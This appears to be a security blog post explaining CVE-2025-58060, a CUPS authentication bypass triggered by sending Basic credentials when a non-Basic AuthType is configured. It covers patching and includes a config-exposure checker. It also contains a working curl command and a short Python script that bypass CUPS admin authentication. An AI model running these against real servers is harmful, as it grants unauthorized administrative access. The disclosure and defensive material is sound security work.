CVE-2025-58060 - Critical Authentication Bypass in OpenPrinting CUPS (How It Works, Exploit Details, and Fix)
OpenPrinting CUPS (Common UNIX Printing System) is a widely used open-source printing server found in nearly every major Linux and UNIX system. In early 2025, a critical vulnerability was discovered that allowed attackers to bypass authentication and access protected resources with ease. In this post, we’ll break down CVE-2025-58060—its cause, consequences, how it can be exploited, and, most importantly, how you can fix it.
What is CVE-2025-58060?
A security flaw was found in CUPS versions 2.4.12 and earlier. If the CUPS server is configured with AuthType set to anything OTHER than Basic (for example, Digest, Negotiate or OAuth), but a client sends an HTTP request with the header Authorization: Basic ..., CUPS does not actually check the password at all. This means anyone can log in—even without providing a valid password!
Beyond logging in, an attacker can perform other sensitive operations without proper authentication.
*Note:* This affects ANY configuration that uses authentication types other than Basic (the default is usually Basic, but many admins harden this for better security).
Let’s look at an example configuration:

```apache
<Location /admin>
AuthType Digest
Require user @SYSTEM
</Location>
```
You intend to use Digest authentication for all requests to /admin. But if someone sends a request like this:
```http
GET /admin HTTP/1.1
Host: cups-server
Authorization: Basic dXNlcjpwYXNzd29yZA==
```
CUPS does NOT check any credentials at all. Regardless of the username or password provided (even totally fake), access will succeed. In other words, sending any Authorization: Basic ... header disables password checking!
Exploit Details
This bug can be abused using curl, web browsers, or any custom HTTP client.
Example: Exploiting with curl
Suppose you want to access the CUPS admin interface without credentials.
```sh
# Assume cups-server is the hostname
curl -v --user fakeuser:fakepass http://cups-server:631/admin
```
Even though the server expects Digest (or something else), *any* Basic credentials will be accepted because the server won’t actually validate them.
How does this work?
Under the hood, the server’s faulty logic only checks passwords if AuthType Basic is configured. If a different AuthType is configured but the request *still* carries an Authorization: Basic header, no password checking happens at all.
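To make that faulty branch concrete, here is an added model of the decision described above (written for this post, not CUPS’s own code). `authorize_vulnerable` mirrors the pre-2.4.13 behaviour the post describes: Basic credentials are verified only when AuthType is Basic and are otherwise waved through. `authorize_fixed` is one way to close the hole, rejecting Basic credentials whenever the configured AuthType is something else. The user table, the function names and the assumption that a password can be checked locally are all constructed for the example.

```python
import base64
import hmac
from typing import Optional, Tuple

# Constructed user database for this illustration (username -> password).
# CUPS checks against system accounts / PAM; this dict is a stand-in so the
# example runs offline.
USERS = {"admin": "correct horse battery staple"}


def _parse_basic(header: Optional[str]) -> Optional[Tuple[str, str]]:
    """Return (user, password) from an 'Authorization: Basic ...' header, else None."""
    if not header:
        return None
    scheme, _, param = header.partition(" ")
    if scheme.lower() != "basic" or not param:
        return None
    try:
        decoded = base64.b64decode(param.strip(), validate=True).decode()
    except ValueError:  # binascii.Error and UnicodeDecodeError are ValueErrors
        return None
    user, sep, password = decoded.partition(":")
    if not sep:
        return None
    return user, password


def _password_ok(user: str, password: str) -> bool:
    """Constant-time comparison against the constructed user table."""
    expected = USERS.get(user)
    if expected is None:
        return False
    return hmac.compare_digest(expected.encode(), password.encode())


def authorize_vulnerable(auth_type: str, header: Optional[str]) -> bool:
    """Model of the pre-2.4.13 logic described in the post (simplified)."""
    creds = _parse_basic(header)
    if creds is None:
        return False  # no Basic credentials: nothing to accept here
    user, password = creds
    if auth_type == "Basic":
        return _password_ok(user, password)
    # Bug: AuthType is Digest/Negotiate/..., the request carried Basic
    # credentials, and the password check is skipped entirely.
    return True


def authorize_fixed(auth_type: str, header: Optional[str]) -> bool:
    """Hardened variant: Basic credentials only count when AuthType is Basic."""
    creds = _parse_basic(header)
    if creds is None:
        return False
    if auth_type != "Basic":
        return False  # credentials of the wrong scheme are rejected, not trusted
    user, password = creds
    return _password_ok(user, password)


def basic_header(user: str, password: str) -> str:
    """Build the header value a client would send for Basic authentication."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


if __name__ == "__main__":
    bogus = basic_header("attacker", "doesnotmatter")
    print("vulnerable, AuthType Digest, bogus Basic creds:", authorize_vulnerable("Digest", bogus))
    print("fixed,      AuthType Digest, bogus Basic creds:", authorize_fixed("Digest", bogus))
```

Running the module shows the vulnerable model accepting made-up credentials under AuthType Digest while the fixed one refuses them; with AuthType Basic both variants still require the real password.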
Here’s a Python code snippet to automate the attack:

```python
import requests
from base64 import b64encode

# Protected /admin location on the CUPS server (hostname assumed).
target = 'http://cups-server:631/admin'
username = 'attacker'
password = 'doesnotmatter'

# Build a Basic credential; on affected versions the password is never
# checked when the configured AuthType is not Basic.
headers = {
    'Authorization': 'Basic ' + b64encode(f"{username}:{password}".encode()).decode()
}

resp = requests.get(target, headers=headers)
if resp.status_code == 200:
    print("[+] Authentication bypassed, you have admin access!")
else:
    print("[-] Exploit failed, server may be patched.")
```
Mitigation and Fix
Upgrade to CUPS 2.4.13 or later.
Developers fixed this bug in commit 7ae8abb, included in version 2.4.13 and above. The fix ensures that improper mixing of AuthTypes does not result in weak bypasses.
For Ubuntu/Debian-based systems:

```sh
sudo apt update
sudo apt install cups
```

For Fedora/RHEL:

```sh
sudo dnf update cups
```

Or download the latest release directly from the OpenPrinting CUPS releases page.
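Before and after patching, it helps to know which Location blocks actually expose the issue. The following added script (not part of this post or of CUPS) parses a cupsd.conf, lists every Location whose effective AuthType is not Basic, and combines that with the installed version to say whether the server is exposed. The sample configuration and version string are constructed; on a real host you would feed it the contents of /etc/cups/cupsd.conf and the version reported by your package manager (or by `cups-config --version`, assumed to be installed).

```python
import re

# Constructed sample cupsd.conf for this example (not from a real server).
# /admin and /admin/conf use explicit non-Basic types; /admin/log uses
# "AuthType Default", which resolves to DefaultAuthType (Basic here).
SAMPLE_CONF = """\
# constructed sample
DefaultAuthType Basic
<Location />
  Order allow,deny
</Location>
<Location /admin>
  AuthType Digest
  Require user @SYSTEM
</Location>
<Location /admin/conf>
  AuthType Negotiate
  Require user @SYSTEM
</Location>
<Location /admin/log>
  AuthType Default
  Require user @SYSTEM
</Location>
<Location /jobs>
  AuthType Basic
  Require valid-user
</Location>
"""

# First release carrying the fix, per the post.
FIXED_VERSION = (2, 4, 13)


def parse_version(text):
    """Extract 'X.Y.Z' from strings such as '2.4.12' or 'CUPS v2.4.12'."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version number found in {text!r}")
    return tuple(int(g) for g in m.groups())


def non_basic_locations(conf_text):
    """Map each <Location> path whose effective AuthType is not Basic to that type."""
    default_type = "Basic"
    m = re.search(r"^\s*DefaultAuthType\s+(\S+)", conf_text, re.I | re.M)
    if m:
        default_type = m.group(1)

    found = {}
    current = None  # path of the <Location> block we are inside, if any
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = re.match(r"<Location\s+(\S+)>", line, re.I)
        if m:
            current = m.group(1)
            continue
        if line.lower() == "</location>":
            current = None
            continue
        m = re.match(r"AuthType\s+(\S+)", line, re.I)
        if m and current is not None:
            auth_type = m.group(1)
            if auth_type.lower() == "default":
                auth_type = default_type
            if auth_type.lower() != "basic":
                found[current] = auth_type
    return found


def assess(version_text, conf_text):
    """Combine installed version and configuration into a triage verdict."""
    version = parse_version(version_text)
    exposed = non_basic_locations(conf_text)
    patched = version >= FIXED_VERSION
    return {
        "version": version,
        "patched": patched,
        "exposed_locations": exposed,
        "vulnerable": (not patched) and bool(exposed),
    }


if __name__ == "__main__":
    verdict = assess("2.4.12", SAMPLE_CONF)
    for path, auth in verdict["exposed_locations"].items():
        print(f"{path}: AuthType {auth}")
    print("vulnerable" if verdict["vulnerable"] else "not exposed")
```

A server whose every protected Location uses Basic is reported as not exposed even on 2.4.12, which matches the post’s note that only non-Basic AuthTypes are affected; the version check alone is still the thing to act on, since a later configuration change would reopen the issue on an unpatched host.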
Links and References
- CVE-2025-58060 at MITRE
- OpenPrinting CUPS 2.4.13 release notes
- Relevant GitHub commit fix
- Original bug report and discussion
- Security advisory by OpenPrinting
Summary
CVE-2025-58060 is a critical vulnerability affecting many CUPS installations, allowing complete authentication bypass when certain configurations are used. If your organization relies on CUPS for printing, update to 2.4.13 or later without delay!
Protect your printers. Patch now.
*Questions or comments? Let us know below!*
Timeline
Published on: 09/11/2025 18:15:34 UTC
Last modified on: 11/04/2025 22:16:32 UTC